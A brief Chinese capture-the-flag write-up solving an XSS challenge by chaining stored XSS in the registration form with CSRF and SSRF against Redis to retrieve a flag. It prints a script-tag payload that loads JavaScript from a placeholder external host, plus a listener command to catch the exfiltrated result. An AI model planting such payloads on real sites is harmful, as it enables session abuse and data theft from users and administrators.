点击此处获得更好的阅读体验
WriteUp来源
题目考点
- XSS
解题思路
简单测试发现注册处存在无过滤xss漏洞,注册时插入payload
用户名: 密码随意
管理员会定期刷新页面,但是由于设置了httponly,不能直接获取cookie
可以看到:
当我们直接访问这个ssrf_for_test.php时提示“权限不足”,但我们可以借助管理员的身份来触发这个ssrf,即是通过xss+csrf发起一个ssrf请求,提示也告诉flag在redis的flag字段,我们只要抓一下这个数据包,构造出这个过程,然后去接收返回结果就行。(网上已有很多资料,ssrf打redis等等)
注册用户
1 | <script src="[http://xxxxxxxxx/getflag.js](http://xxxxxxxxx/getflag.js)></script> |
监听一哈 python3 -m http.server 9999
上个厕所回来就看到flag